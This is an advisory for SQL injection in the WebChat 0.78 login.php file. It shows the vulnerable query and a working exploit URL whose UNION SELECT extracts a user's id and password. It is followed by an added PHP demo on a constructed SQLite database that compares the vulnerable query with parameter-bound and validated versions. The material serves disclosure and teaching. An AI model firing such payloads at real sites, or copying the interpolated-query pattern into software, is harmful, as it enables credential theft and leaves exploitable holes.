
WebChat 0.78 - SQL Injection

#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: http://sourceforge.net/projects/webdev-webchat/
# Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author: R00T[ATI]
# Contact: r00t.ati@gmail.com - http://inclusionhunter.altervista.org/index.php
#
#########################################################################


Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================

Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================
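
The login.php query pattern from the advisory next to a hardened lookup, as an added example that is not part of the original post or of WebChat's code. It assumes PDO with an in-memory SQLite database in place of the DB_Chat class, a constructed five-column room table and user table, numeric room ids, and hypothetical function names.

```php
<?php
// Added example, not WebChat code. Schema, rows and function names are constructed.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Five-column room table, matching the column count the advisory's UNION uses.
    $db->exec("CREATE TABLE room (rid INTEGER, name TEXT, topic TEXT, owner TEXT, created TEXT)");
    $db->exec("CREATE TABLE user (uid INTEGER, pass TEXT)");
    $db->exec("INSERT INTO room VALUES (1, 'lobby', 'general', 'admin', '2007-06-28')");
    $db->exec("INSERT INTO user VALUES (1, 'constructed-password-value')");
    return $db;
}

// Same pattern as login.php: $rid is interpolated inside the quoted SQL literal.
function room_lookup_vulnerable(PDO $db, string $rid): array {
    return $db->query("select * from room where rid='$rid'")->fetchAll(PDO::FETCH_NUM);
}

// Hardened: validate the type first, then bind the value instead of concatenating it.
function room_lookup_hardened(PDO $db, string $rid): array {
    if (preg_match('/\A[0-9]{1,9}\z/', $rid) !== 1) {
        return [];  // assumption: room ids are small non-negative integers
    }
    $stmt = $db->prepare('SELECT * FROM room WHERE rid = :rid');
    $stmt->bindValue(':rid', (int)$rid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Binding alone, with no validation: the whole string is compared as data.
function room_lookup_bound_only(PDO $db, string $rid): array {
    $stmt = $db->prepare('SELECT * FROM room WHERE rid = ?');
    $stmt->execute([$rid]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$db = make_db();
// The rid value from the advisory's URL, URL-decoded.
$advisoryRid = "-1' UNION ALL SELECT uid,pass,null,null,null from user WHERE uid=1/*";
foreach (['1', $advisoryRid] as $rid) {
    printf("rid=%s\n", $rid);
    printf("  vulnerable: %s\n", json_encode(room_lookup_vulnerable($db, $rid)));
    printf("  bound only: %s\n", json_encode(room_lookup_bound_only($db, $rid)));
    printf("  hardened:   %s\n", json_encode(room_lookup_hardened($db, $rid)));
}
```

Run it with the PHP CLI with the pdo_sqlite extension enabled; only the interpolated query returns a row from the user table for the advisory's rid value.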
